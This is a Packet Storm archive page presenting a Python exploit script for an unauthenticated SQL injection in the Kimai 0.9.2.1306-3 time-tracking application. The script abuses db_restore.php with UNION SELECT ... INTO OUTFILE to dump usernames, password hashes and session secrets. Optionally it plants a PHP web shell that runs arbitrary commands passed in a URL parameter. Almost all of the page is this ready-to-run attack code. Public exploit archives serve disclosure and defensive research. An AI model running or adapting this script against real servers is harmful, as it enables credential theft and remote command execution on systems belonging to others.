what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Kimai 0.9.2.1306-3 SQL Injection

Kimai 0.9.2.1306-3 SQL Injection
Posted May 21, 2013
Authored by drone | Site kimai.org

Kimai version 0.9.2.1306-3 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
systems | linux, windows
SHA-256 | 0500e2f1f7402ade9a36fb3bbcdf907836374db397c71ed558baeaefcc940edc

Kimai 0.9.2.1306-3 SQL Injection

Change Mirror Download
# Exploit Title: Kimai 0.9.2.1306-3 SQLi
# Date: 05/20/2013
# Exploit Author: drone (@dronesec)
# Vendor Homepage: http://www.kimai.org/
# Software Link: https://downloads.sourceforge.net/project/kimai/0.9.x/kimai.0.9.2.1306-3.zip
# Version: 0.9.2.1306-3
# Fixed in: source repositories (https://github.com/kimai/kimai)
# Tested on: Windows XP SP3, Ubuntu 12.04 (apparmor disabled)

"""
This doesn't even require authentication to the
web app, as the file is accessible to any user.

Modify paths accordingly if running against Windows

@dronesec
"""
from argparse import ArgumentParser
import string
import random
import urllib2
import sys
import re

def webshell(options, id):
""" dat webshell
"""
shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
sqli = ('http://{0}/kimai/db_restore.php?dates%5B%5D={1}_kimai_var%20UNION'
'%20SELECT%20\'<?php%20system($_GET["rr"]);?>\'%20FROM%20kimai_usr'
'%20INTO%20OUTFILE%20\'{2}/{3}.php\';--%20&submit=recover')

urllib2.urlopen(sqli.format(options.ip, id, options.path, shell))
print '[!] Shell dropped. Go hit http://%s/kimai/%s.php?rr=ls'%(options.ip, shell)

def fetch_id(options):
id = None
try:
page = urllib2.urlopen('http://%s/kimai/db_restore.php'%options.ip).read()
id = re.findall('name="dates\[\]" value=\"(.*?)\">', page)[0]
except: pass
return id

def run(options):
# poll URL for valid backup id
id = None
while id is None:
id = fetch_id(options)
if id is None:
print '[-] No backups found, creating one...'
urllib2.urlopen('http://%s/kimai/db_restore.php?submit=create+backup'%options.ip)

print '[!] Using backup id', id

if options.shell:
return webshell(options, id)

print '[!] Running queries...'

# execute sqli
sqli = ('http://{0}/kimai/db_restore.php?dates%5B%5D={1}_kimai_var%20UNION'
'%20SELECT%20{3}%20FROM%20kimai_usr%20INTO%20OUTFILE%20\'{2}/{3}\';--%20&submit=recover')

urllib2.urlopen(sqli.format(options.ip, id, options.path, 'usr_name'))

# execute sqli; hashes
urllib2.urlopen(sqli.format(options.ip, id, options.path, 'pw'))

# get sessions
urllib2.urlopen(sqli.format(options.ip, id, options.path, 'secure'))

print '[!] Go grab your files:\n\t{0}/usr_names\n\t{0}/pw\n\t{0}/secure'\
.format(options.path)

def parse():
parser = ArgumentParser()
parser.add_argument('-i', help='server address', action='store', dest='ip')
parser.add_argument('-p', help='path to dump files (otherwise guesses /var/www/kimai)',
action='store',default='/var/www/kimai', dest='path')
parser.add_argument('-w', help='web shell', action='store_true', dest='shell')

options = parser.parse_args()

if not options.ip:
parser.print_help()
sys.exit(1)

options.path = options.path if options.path[-1] != '/' else options.path[:-1]
return options

if __name__ == "__main__":
run(parse())
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close